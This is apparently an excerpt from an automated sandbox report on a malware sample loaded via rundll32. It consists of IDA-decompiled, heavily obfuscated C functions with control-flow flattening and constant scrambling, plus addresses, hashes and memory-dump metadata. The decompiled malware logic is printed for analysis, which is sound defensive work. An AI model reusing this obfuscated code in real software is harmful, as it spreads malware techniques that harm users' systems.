											_v560 = _t304;
											_v552 = _t304;
											_v544 = _t304;
											_v536 = _t304;
											_v532 = _v660;
											_v564 = _t321;
											_v556 = _t321;
											_v548 = _t321;
											_v540 = _t321;
											_t307 = E00175D65(_t321, _t344, _v636, _t321,  &_v564, _v584, _v696, _v668);
											_t352 = _t352 + 0x18;
											__eflags = _t307;
											_t315 =  !=  ? 1 : _t315;
											_t316 = 0xe98dd96;
											continue;
										} else {
											_t362 = _t316 - 0xf7fe787;
											if(_t316 != 0xf7fe787) {
												goto L15;
											} else {
												_push(_v692);
												_push(_v676);
												_push(0x1710cc);
												_t308 = E0017AB66(_v648, _v644, _t362);
												_t309 =  *0x19520c; // 0x0
												_t311 =  *0x19520c; // 0x0
												E0017E7CE(_t308, _t362, _v588, _t311 + 8, _v648, _v640, _v684, _v632, _v652, _t309 + 0x220);
												E0017AE03(_v656, _v624, _v612, _t308);
												_t352 = _t352 + 0x34;
												_t316 = 0x5ceff6a;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t315;
					}
					_v572 = _v572 - E00179A1E();
					_t316 = 0xf7fe787;
					asm("sbb [esp+0x94], edx");
					L15:
					__eflags = _t316 - 0x36ffdb;
				} while (__eflags != 0);
				goto L18;
			}





























































                                                                                                                      0x0018b397
                                                                                                                      0x0018b3a1
                                                                                                                      0x0018b3a5
                                                                                                                      0x0018b3aa
                                                                                                                      0x0018b3af
                                                                                                                      0x0018b3b4
                                                                                                                      0x0018b3bc
                                                                                                                      0x0018b3c4
                                                                                                                      0x0018b3d5
                                                                                                                      0x0018b3d9
                                                                                                                      0x0018b3db
                                                                                                                      0x0018b3e3
                                                                                                                      0x0018b3eb
                                                                                                                      0x0018b3fa
                                                                                                                      0x0018b3fd
                                                                                                                      0x0018b404
                                                                                                                      0x0018b40f
                                                                                                                      0x0018b417
                                                                                                                      0x0018b41c
                                                                                                                      0x0018b424
                                                                                                                      0x0018b42c
                                                                                                                      0x0018b43c
                                                                                                                      0x0018b440
                                                                                                                      0x0018b448
                                                                                                                      0x0018b450
                                                                                                                      0x0018b458
                                                                                                                      0x0018b460
                                                                                                                      0x0018b468
                                                                                                                      0x0018b470
                                                                                                                      0x0018b478
                                                                                                                      0x0018b480
                                                                                                                      0x0018b488
                                                                                                                      0x0018b494
                                                                                                                      0x0018b497
                                                                                                                      0x0018b49b
                                                                                                                      0x0018b4a3
                                                                                                                      0x0018b4ab
                                                                                                                      0x0018b4b3
                                                                                                                      0x0018b4c0
                                                                                                                      0x0018b4c4
                                                                                                                      0x0018b4cc
                                                                                                                      0x0018b4d4
                                                                                                                      0x0018b4d9
                                                                                                                      0x0018b4de
                                                                                                                      0x0018b4e6
                                                                                                                      0x0018b4ee
                                                                                                                      0x0018b4f9
                                                                                                                      0x0018b500
                                                                                                                      0x0018b50b
                                                                                                                      0x0018b513
                                                                                                                      0x0018b51d
                                                                                                                      0x0018b521
                                                                                                                      0x0018b529
                                                                                                                      0x0018b531
                                                                                                                      0x0018b536
                                                                                                                      0x0018b53b
                                                                                                                      0x0018b543
                                                                                                                      0x0018b54b
                                                                                                                      0x0018b558
                                                                                                                      0x0018b561
                                                                                                                      0x0018b565
                                                                                                                      0x0018b56d
                                                                                                                      0x0018b575
                                                                                                                      0x0018b57d
                                                                                                                      0x0018b587
                                                                                                                      0x0018b594
                                                                                                                      0x0018b59c
                                                                                                                      0x0018b5a4
                                                                                                                      0x0018b5ac
                                                                                                                      0x0018b5b4
                                                                                                                      0x0018b5bc
                                                                                                                      0x0018b5c0
                                                                                                                      0x0018b5c8
                                                                                                                      0x0018b5d0
                                                                                                                      0x0018b5d8
                                                                                                                      0x0018b5dd
                                                                                                                      0x0018b5e5
                                                                                                                      0x0018b5ed
                                                                                                                      0x0018b5f5
                                                                                                                      0x0018b5fd
                                                                                                                      0x0018b605
                                                                                                                      0x0018b60d
                                                                                                                      0x0018b621
                                                                                                                      0x0018b626
                                                                                                                      0x0018b62f
                                                                                                                      0x0018b63a
                                                                                                                      0x0018b645
                                                                                                                      0x0018b650
                                                                                                                      0x0018b65b
                                                                                                                      0x0018b663
                                                                                                                      0x0018b668
                                                                                                                      0x0018b670
                                                                                                                      0x0018b678
                                                                                                                      0x0018b680
                                                                                                                      0x0018b685
                                                                                                                      0x0018b68d
                                                                                                                      0x0018b695
                                                                                                                      0x0018b69d
                                                                                                                      0x0018b6a5
                                                                                                                      0x0018b6ad
                                                                                                                      0x0018b6b8
                                                                                                                      0x0018b6c3
                                                                                                                      0x0018b6ce
                                                                                                                      0x0018b6d6
                                                                                                                      0x0018b6db
                                                                                                                      0x0018b6e4
                                                                                                                      0x0018b6e9
                                                                                                                      0x0018b6ef
                                                                                                                      0x0018b6f7
                                                                                                                      0x0018b6ff
                                                                                                                      0x0018b707
                                                                                                                      0x0018b70f
                                                                                                                      0x0018b717
                                                                                                                      0x0018b71f
                                                                                                                      0x0018b727
                                                                                                                      0x0018b72f
                                                                                                                      0x0018b737
                                                                                                                      0x0018b73f
                                                                                                                      0x0018b744
                                                                                                                      0x0018b74c
                                                                                                                      0x0018b754
                                                                                                                      0x0018b75c
                                                                                                                      0x0018b764
                                                                                                                      0x0018b76c
                                                                                                                      0x0018b774
                                                                                                                      0x0018b780
                                                                                                                      0x0018b783
                                                                                                                      0x0018b787
                                                                                                                      0x0018b78b
                                                                                                                      0x0018b793
                                                                                                                      0x0018b793
                                                                                                                      0x0018b7a5
                                                                                                                      0x0018b95b
                                                                                                                      0x00000000
                                                                                                                      0x0018b7ab
                                                                                                                      0x0018b7ad
                                                                                                                      0x0018b94b
                                                                                                                      0x0018b951
                                                                                                                      0x00000000
                                                                                                                      0x0018b7b3
                                                                                                                      0x0018b7b9
                                                                                                                      0x0018b922
                                                                                                                      0x0018b927
                                                                                                                      0x0018b929
                                                                                                                      0x0018b92c
                                                                                                                      0x0018b92f
                                                                                                                      0x0018b931
                                                                                                                      0x00000000
                                                                                                                      0x0018b931
                                                                                                                      0x0018b7bf
                                                                                                                      0x0018b7c5
                                                                                                                      0x0018b99c
                                                                                                                      0x0018b7cb
                                                                                                                      0x0018b7d1
                                                                                                                      0x0018b861
                                                                                                                      0x0018b86a
                                                                                                                      0x0018b871
                                                                                                                      0x0018b878
                                                                                                                      0x0018b87f
                                                                                                                      0x0018b886
                                                                                                                      0x0018b895
                                                                                                                      0x0018b8a7
                                                                                                                      0x0018b8b5
                                                                                                                      0x0018b8c2
                                                                                                                      0x0018b8c9
                                                                                                                      0x0018b8d0
                                                                                                                      0x0018b8d7
                                                                                                                      0x0018b8db
                                                                                                                      0x0018b8dd
                                                                                                                      0x0018b8e0
                                                                                                                      0x00000000
                                                                                                                      0x0018b7d7
                                                                                                                      0x0018b7d7
                                                                                                                      0x0018b7dd
                                                                                                                      0x00000000
                                                                                                                      0x0018b7e3
                                                                                                                      0x0018b7e3
                                                                                                                      0x0018b7e7
                                                                                                                      0x0018b7f3
                                                                                                                      0x0018b7f8
                                                                                                                      0x0018b802
                                                                                                                      0x0018b81f
                                                                                                                      0x0018b837
                                                                                                                      0x0018b84f
                                                                                                                      0x0018b854
                                                                                                                      0x0018b857
                                                                                                                      0x00000000
                                                                                                                      0x0018b857
                                                                                                                      0x0018b7dd
                                                                                                                      0x0018b7d1
                                                                                                                      0x0018b7c5
                                                                                                                      0x0018b7b9
                                                                                                                      0x0018b7ad
                                                                                                                      0x0018b9a7
                                                                                                                      0x0018b9b0
                                                                                                                      0x0018b9b0
                                                                                                                      0x0018b967
                                                                                                                      0x0018b96e
                                                                                                                      0x0018b973
                                                                                                                      0x0018b97a
                                                                                                                      0x0018b97a
                                                                                                                      0x0018b97a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #?$8$V$aIg$qM
                                                                                                                      • API String ID: 0-1946175224
                                                                                                                      • Opcode ID: b66c230a8cd56499f78f41cf0ffe6d72af4ed8cdb9238a6b68ed473532f28f4d
                                                                                                                      • Instruction ID: 4dc0da62c57b1d82f80cd9a855def040ccda5f4c5c88153287c37bd61e60d2a9
                                                                                                                      • Opcode Fuzzy Hash: b66c230a8cd56499f78f41cf0ffe6d72af4ed8cdb9238a6b68ed473532f28f4d
                                                                                                                      • Instruction Fuzzy Hash: C1E11EB14087809FD368CF65C48A65BBBF1FBC4758F20891DF2AA86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00190867 Relevance: 6.5, Strings: 5, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00190867(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t261;
				intOrPtr* _t266;
				intOrPtr _t273;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t316;
				intOrPtr _t317;
				intOrPtr _t318;
				intOrPtr _t319;
				signed int* _t320;

				_t275 = __ecx;
				_t320 =  &_v116;
				_v12 = __edx;
				_v28 = __ecx;
				_v8 = 0x8dec59;
				_v4 = 0;
				_v84 = 0xe165d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xc1b7;
				_v84 = _v84 ^ 0xc80f2461;
				_v84 = _v84 ^ 0xcf04d456;
				_v32 = 0x655f30;
				_v32 = _v32 + 0x312d;
				_v32 = _v32 ^ 0x0065b82f;
				_v56 = 0xcafed0;
				_v24 = 0;
				_t316 = 0x75256fb;
				_t307 = 0x74;
				_v56 = _v56 / _t307;
				_v56 = _v56 | 0x8b781090;
				_v56 = _v56 ^ 0x8b7ff779;
				_v96 = 0xabe325;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xcbcb3531;
				_v96 = _v96 | 0x09a083b5;
				_v96 = _v96 ^ 0xbfa5786a;
				_v76 = 0x7b9c0a;
				_t308 = 0x1c;
				_v76 = _v76 / _t308;
				_v76 = _v76 + 0xffff76d9;
				_v76 = _v76 ^ 0x00066890;
				_v80 = 0xfad268;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x68dc041b;
				_v80 = _v80 ^ 0xbab50c4e;
				_v112 = 0x5717c0;
				_v112 = _v112 + 0xd318;
				_v112 = _v112 + 0xffff9813;
				_v112 = _v112 ^ 0x80b72014;
				_v112 = _v112 ^ 0x80e33bd1;
				_v116 = 0x9f285d;
				_v116 = _v116 >> 9;
				_v116 = _v116 + 0xffff6359;
				_v116 = _v116 + 0x4b40;
				_v116 = _v116 ^ 0xfffb57cb;
				_v104 = 0x80a8a2;
				_t309 = 0x29;
				_v104 = _v104 * 0x2c;
				_v104 = _v104 | 0xf3fc02bd;
				_v104 = _v104 * 0x46;
				_v104 = _v104 ^ 0xcf237eb9;
				_v72 = 0x5bfbbd;
				_v72 = _v72 | 0xd3d7b19d;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfee9d95e;
				_v108 = 0xd9b2ce;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0xffff979e;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x6594627e;
				_v40 = 0xeed128;
				_v40 = _v40 * 0x34;
				_v40 = _v40 ^ 0x3088f647;
				_v68 = 0x4ae85e;
				_v68 = _v68 / _t309;
				_t310 = 0x35;
				_t319 = _v12;
				_v68 = _v68 * 0x53;
				_v68 = _v68 ^ 0x009a12ab;
				_v60 = 0xe58ccf;
				_v60 = _v60 / _t310;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0x00082ee6;
				_v100 = 0x896781;
				_v100 = _v100 ^ 0xb532ffdf;
				_t311 = 0x3d;
				_v100 = _v100 / _t311;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x0003daf8;
				_v64 = 0xd8c0ce;
				_v64 = _v64 + 0xffffaca0;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x86dd78e3;
				_v36 = 0xf932ba;
				_t312 = 0x7f;
				_v36 = _v36 * 0x58;
				_v36 = _v36 ^ 0x55a76b7b;
				_v88 = 0x9f6659;
				_v88 = _v88 / _t312;
				_v88 = _v88 | 0x1ff6fbbf;
				_v88 = _v88 ^ 0xc9c88694;
				_v88 = _v88 ^ 0xd6316d06;
				_v48 = 0x252418;
				_v48 = _v48 ^ 0x008304c1;
				_v48 = _v48 + 0xffff4e21;
				_v48 = _v48 ^ 0x00a4a0c7;
				_v92 = 0xdb5076;
				_v92 = _v92 + 0xffff1b85;
				_v92 = _v92 | 0x2d9bcef8;
				_t313 = 0x68;
				_v92 = _v92 / _t313;
				_v92 = _v92 ^ 0x0076c4f2;
				_v52 = 0x242151;
				_v52 = _v52 | 0x94ee4ace;
				_v52 = _v52 + 0xf8ef;
				_v52 = _v52 ^ 0x94e81f3d;
				_t314 = _v4;
				_t274 = _v8;
				L1:
				while(1) {
					do {
						while(_t316 != 0x1075595) {
							if(_t316 == 0x75256fb) {
								_t316 = 0x1075595;
								continue;
							} else {
								if(_t316 != 0xe0f16ec) {
									goto L15;
								} else {
									_t281 = E0017840B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
									_t320 =  &(_t320[6]);
									_v24 = _t281;
									if(_t281 == 0) {
										_t317 = _v24;
										L20:
										E001768DE(_v88, _v48, _v92, _v52, _t274);
									} else {
										_t282 = _v20;
										if(_t282 == 0) {
											goto L16;
										} else {
											_v44 = _v44 + _t282;
											_t319 = _t319 - _t282;
											if(_t319 != 0) {
												L9:
												_t261 = _v44;
												L10:
												_t275 = _v28;
												_t316 = 0xe0f16ec;
												continue;
											} else {
												_t283 = _t314 + _t314;
												_push(_t283);
												_push(_t283);
												_v16 = _t283;
												_t318 = E00183512(_t283);
												if(_t318 == 0) {
													goto L16;
												} else {
													E0018FD29(_t274, _v40, _t318, _v68, _t314);
													E001768DE(_v60, _v100, _v64, _v36, _t274);
													_t319 = _t314;
													_t273 = _t318 + _t314;
													_t314 = _v16;
													_t320 =  &(_t320[6]);
													_v44 = _t273;
													_t274 = _t318;
													if(_t319 == 0) {
														goto L16;
													} else {
														goto L9;
													}
												}
											}
										}
									}
								}
							}
							L18:
							return _t317;
						}
						_t314 = 0x10000;
						_push(_t275);
						_push(_t275);
						_t261 = E00183512(0x10000);
						_t274 = _t261;
						if(_t274 == 0) {
							_t275 = _v28;
							_t316 = 0x6559491;
							goto L15;
						} else {
							_v44 = _t261;
							_t319 = 0x10000;
							goto L10;
						}
						goto L18;
						L15:
						_t261 = _v44;
					} while (_t316 != 0x6559491);
					L16:
					_t317 = _v24;
					if(_t317 == 0) {
						goto L20;
					} else {
						_t266 = _v12;
						 *_t266 = _t274;
						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
					}
					goto L18;
				}
			}





















































                                                                                                                      0x00190867
                                                                                                                      0x00190867
                                                                                                                      0x0019086e
                                                                                                                      0x00190872
                                                                                                                      0x00190876
                                                                                                                      0x00190880
                                                                                                                      0x00190887
                                                                                                                      0x0019088f
                                                                                                                      0x00190894
                                                                                                                      0x0019089c
                                                                                                                      0x001908a4
                                                                                                                      0x001908ac
                                                                                                                      0x001908b4
                                                                                                                      0x001908bc
                                                                                                                      0x001908c4
                                                                                                                      0x001908cc
                                                                                                                      0x001908d0
                                                                                                                      0x001908dd
                                                                                                                      0x001908e2
                                                                                                                      0x001908e8
                                                                                                                      0x001908f0
                                                                                                                      0x001908f8
                                                                                                                      0x00190900
                                                                                                                      0x00190905
                                                                                                                      0x0019090d
                                                                                                                      0x00190915
                                                                                                                      0x0019091d
                                                                                                                      0x00190929
                                                                                                                      0x0019092e
                                                                                                                      0x00190932
                                                                                                                      0x0019093a
                                                                                                                      0x00190942
                                                                                                                      0x0019094a
                                                                                                                      0x0019094f
                                                                                                                      0x00190957
                                                                                                                      0x0019095f
                                                                                                                      0x00190967
                                                                                                                      0x0019096f
                                                                                                                      0x00190977
                                                                                                                      0x0019097f
                                                                                                                      0x00190987
                                                                                                                      0x0019098f
                                                                                                                      0x00190994
                                                                                                                      0x0019099c
                                                                                                                      0x001909a4
                                                                                                                      0x001909ac
                                                                                                                      0x001909b9
                                                                                                                      0x001909ba
                                                                                                                      0x001909be
                                                                                                                      0x001909cb
                                                                                                                      0x001909cf
                                                                                                                      0x001909d7
                                                                                                                      0x001909df
                                                                                                                      0x001909e7
                                                                                                                      0x001909ec
                                                                                                                      0x001909f4
                                                                                                                      0x001909fc
                                                                                                                      0x00190a01
                                                                                                                      0x00190a09
                                                                                                                      0x00190a0e
                                                                                                                      0x00190a16
                                                                                                                      0x00190a23
                                                                                                                      0x00190a27
                                                                                                                      0x00190a31
                                                                                                                      0x00190a41
                                                                                                                      0x00190a4c
                                                                                                                      0x00190a4f
                                                                                                                      0x00190a53
                                                                                                                      0x00190a57
                                                                                                                      0x00190a5f
                                                                                                                      0x00190a6f
                                                                                                                      0x00190a73
                                                                                                                      0x00190a78
                                                                                                                      0x00190a80
                                                                                                                      0x00190a88
                                                                                                                      0x00190a94
                                                                                                                      0x00190a99
                                                                                                                      0x00190a9f
                                                                                                                      0x00190aa4
                                                                                                                      0x00190aac
                                                                                                                      0x00190ab4
                                                                                                                      0x00190abc
                                                                                                                      0x00190ac1
                                                                                                                      0x00190ac9
                                                                                                                      0x00190ad6
                                                                                                                      0x00190ad9
                                                                                                                      0x00190add
                                                                                                                      0x00190ae5
                                                                                                                      0x00190af5
                                                                                                                      0x00190af9
                                                                                                                      0x00190b01
                                                                                                                      0x00190b09
                                                                                                                      0x00190b11
                                                                                                                      0x00190b19
                                                                                                                      0x00190b21
                                                                                                                      0x00190b29
                                                                                                                      0x00190b31
                                                                                                                      0x00190b39
                                                                                                                      0x00190b41
                                                                                                                      0x00190b4d
                                                                                                                      0x00190b50
                                                                                                                      0x00190b54
                                                                                                                      0x00190b60
                                                                                                                      0x00190b68
                                                                                                                      0x00190b70
                                                                                                                      0x00190b78
                                                                                                                      0x00190b80
                                                                                                                      0x00190b87
                                                                                                                      0x00000000
                                                                                                                      0x00190b8b
                                                                                                                      0x00190b8b
                                                                                                                      0x00190b8b
                                                                                                                      0x00190b9d
                                                                                                                      0x00190c68
                                                                                                                      0x00000000
                                                                                                                      0x00190ba3
                                                                                                                      0x00190ba9
                                                                                                                      0x00000000
                                                                                                                      0x00190baf
                                                                                                                      0x00190bcb
                                                                                                                      0x00190bcd
                                                                                                                      0x00190bd0
                                                                                                                      0x00190bd6
                                                                                                                      0x00190cd2
                                                                                                                      0x00190cd6
                                                                                                                      0x00190ce7
                                                                                                                      0x00190bdc
                                                                                                                      0x00190bdc
                                                                                                                      0x00190be2
                                                                                                                      0x00000000
                                                                                                                      0x00190be8
                                                                                                                      0x00190be8
                                                                                                                      0x00190bec
                                                                                                                      0x00190bee
                                                                                                                      0x00190c56
                                                                                                                      0x00190c56
                                                                                                                      0x00190c5a
                                                                                                                      0x00190c5a
                                                                                                                      0x00190c5e
                                                                                                                      0x00000000
                                                                                                                      0x00190bf0
                                                                                                                      0x00190bf4
                                                                                                                      0x00190bff
                                                                                                                      0x00190c00
                                                                                                                      0x00190c01
                                                                                                                      0x00190c0a
                                                                                                                      0x00190c10
                                                                                                                      0x00000000
                                                                                                                      0x00190c16
                                                                                                                      0x00190c22
                                                                                                                      0x00190c38
                                                                                                                      0x00190c3d
                                                                                                                      0x00190c3f
                                                                                                                      0x00190c42
                                                                                                                      0x00190c49
                                                                                                                      0x00190c4c
                                                                                                                      0x00190c50
                                                                                                                      0x00190c54
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00190c54
                                                                                                                      0x00190c10
                                                                                                                      0x00190bee
                                                                                                                      0x00190be2
                                                                                                                      0x00190bd6
                                                                                                                      0x00190ba9
                                                                                                                      0x00190cc9
                                                                                                                      0x00190cd1
                                                                                                                      0x00190cd1
                                                                                                                      0x00190c76
                                                                                                                      0x00190c83
                                                                                                                      0x00190c84
                                                                                                                      0x00190c87
                                                                                                                      0x00190c8c
                                                                                                                      0x00190c92
                                                                                                                      0x00190c9c
                                                                                                                      0x00190ca0
                                                                                                                      0x00000000
                                                                                                                      0x00190c94
                                                                                                                      0x00190c94
                                                                                                                      0x00190c98
                                                                                                                      0x00000000
                                                                                                                      0x00190c98
                                                                                                                      0x00000000
                                                                                                                      0x00190ca5
                                                                                                                      0x00190ca5
                                                                                                                      0x00190ca9
                                                                                                                      0x00190cb5
                                                                                                                      0x00190cb5
                                                                                                                      0x00190cbb
                                                                                                                      0x00000000
                                                                                                                      0x00190cbd
                                                                                                                      0x00190cbd
                                                                                                                      0x00190cc3
                                                                                                                      0x00190cc5
                                                                                                                      0x00190cc5
                                                                                                                      0x00000000
                                                                                                                      0x00190cbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: 2f95b21d7b212887bdbc443d4286cecb10a6864143be463f3881a8f8c7c4580f
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: 39C10FB15083819FC358DF69C48980BFBE1FBD9798F508A1DF5A696220D3B1D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00180946 Relevance: 6.5, Strings: 5, Instructions: 215COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00180946(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t226;
				signed int _t228;
				void* _t231;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				void* _t263;
				void* _t264;
				signed int _t265;
				signed int* _t267;
				signed int* _t268;

				_t267 =  &_v88;
				_v4 = _v4 & 0x00000000;
				_v8 = 0xb66c37;
				_v72 = 0xb73c2;
				_v72 = _v72 << 4;
				_v72 = _v72 | 0x07739320;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0xef7952b0;
				_v28 = 0x2a4560;
				_v28 = _v28 + 0x8659;
				_v28 = _v28 ^ 0x002a9629;
				_v76 = 0x8c4def;
				_t263 = __edx;
				_t231 = __ecx;
				_t264 = 0xd46e588;
				_t233 = 0x74;
				_v76 = _v76 / _t233;
				_t234 = 0x6c;
				_v76 = _v76 * 3;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x000c6890;
				_v80 = 0x921d05;
				_v80 = _v80 + 0xffff1131;
				_v80 = _v80 / _t234;
				_v80 = _v80 + 0xffff8087;
				_v80 = _v80 ^ 0x0007528b;
				_v20 = 0x474e9c;
				_t235 = 0xb;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x0a4b2981;
				_v44 = 0x41d7a6;
				_v44 = _v44 >> 4;
				_v44 = _v44 + 0xffffa7bd;
				_v44 = _v44 ^ 0x00093433;
				_v68 = 0x96e6ad;
				_v68 = _v68 * 0xe;
				_v68 = _v68 + 0x1201;
				_v68 = _v68 >> 9;
				_v68 = _v68 ^ 0x000fa369;
				_v24 = 0xe45c66;
				_t66 =  &_v24; // 0xe45c66
				_v24 =  *_t66 / _t235;
				_v24 = _v24 ^ 0x001eca74;
				_v12 = 0xe2325f;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x003de0fa;
				_v40 = 0xdcdb46;
				_v40 = _v40 + 0xfb03;
				_v40 = _v40 + 0xffff4ab2;
				_v40 = _v40 ^ 0x00d010f5;
				_v16 = 0xf0578c;
				_t236 = 0x25;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x2a381d62;
				_v60 = 0xf0efbe;
				_v60 = _v60 / _t236;
				_t265 = 0x18;
				_v60 = _v60 / _t265;
				_v60 = _v60 + 0xffffc994;
				_v60 = _v60 ^ 0x00051ba1;
				_v64 = 0xfb78a0;
				_v64 = _v64 << 9;
				_t237 = 0x41;
				_v64 = _v64 / _t237;
				_v64 = _v64 | 0xcaafab65;
				_v64 = _v64 ^ 0xcbeb608b;
				_v84 = 0xb70797;
				_v84 = _v84 ^ 0x7f243ece;
				_v84 = _v84 | 0x19416b2b;
				_v84 = _v84 ^ 0xcf7db733;
				_v84 = _v84 ^ 0xb0a40cc8;
				_v88 = 0xcdb2b9;
				_v88 = _v88 + 0x7ca0;
				_v88 = _v88 + 0xffff4266;
				_v88 = _v88 / _t265;
				_v88 = _v88 ^ 0x000ad15f;
				_v32 = 0x3f4742;
				_v32 = _v32 + 0xffff8438;
				_v32 = _v32 ^ 0x00328def;
				_v48 = 0xe7fa35;
				_v48 = _v48 | 0x5473134a;
				_v48 = _v48 + 0x6bf3;
				_v48 = _v48 ^ 0x54f160bb;
				_v36 = 0x82f06;
				_v36 = _v36 >> 1;
				_v36 = _v36 * 0x4f;
				_v36 = _v36 ^ 0x0140909c;
				_v52 = 0x77cd37;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0x0f05aaad;
				_v52 = _v52 * 0x5b;
				_v52 = _v52 ^ 0x116d7cbe;
				_v56 = 0x6cb0a3;
				_v56 = _v56 + 0xab46;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x7715;
				_v56 = _v56 ^ 0x0001d55a;
				do {
					while(_t264 != 0x8d90b87) {
						if(_t264 == 0x991fac7) {
							return E0017F88A(_v36, _v52, _v56,  *(_t263 + 0x30));
						}
						if(_t264 == 0xa3f1429) {
							_push(_t237);
							_t228 = E00188D71(_v72, _v28, __eflags, _v76, _v80, _t231);
							_t268 =  &(_t267[4]);
							 *(_t263 + 0x30) = _t228;
							__eflags = _t228;
							if(_t228 != 0) {
								E0017EE05(_v44, _v68, _v24, _t228, _t228);
								_t237 =  *(_t263 + 0x30);
								E0018E713(_t237, _v12, _v40, _v16);
								_t267 =  &(_t268[6]);
								_t264 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t264 == 0xd46e588) {
								_t264 = 0xa3f1429;
								continue;
							} else {
								if(_t264 != 0xf9322b8) {
									goto L14;
								} else {
									_t237 = E00176ED6;
									_t228 = E00184EFF(E00176ED6, _v84, E00176ED6, E00176ED6, _v88, _v32, E00176ED6, _v48, _t263);
									_t267 =  &(_t267[8]);
									 *(_t263 + 0x24) = _t228;
									if(_t228 == 0) {
										_t264 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t228;
						L18:
					}
					_t237 = _v60;
					_t226 = E00182BDE(_t237,  *(_t263 + 0x30), _v64);
					_t267 =  &(_t267[1]);
					 *(_t263 + 0xc) = _t226;
					__eflags = _t226;
					if(__eflags == 0) {
						_t264 = 0x991fac7;
						goto L14;
					} else {
						_t264 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t264 - 0x74fce14;
				} while (__eflags != 0);
				return _t228;
			}






































                                                                                                                      0x00180946
                                                                                                                      0x00180949
                                                                                                                      0x0018094e
                                                                                                                      0x00180956
                                                                                                                      0x0018095e
                                                                                                                      0x00180963
                                                                                                                      0x0018096b
                                                                                                                      0x00180970
                                                                                                                      0x00180978
                                                                                                                      0x00180980
                                                                                                                      0x00180988
                                                                                                                      0x00180990
                                                                                                                      0x001809a0
                                                                                                                      0x001809a2
                                                                                                                      0x001809a8
                                                                                                                      0x001809ad
                                                                                                                      0x001809b2
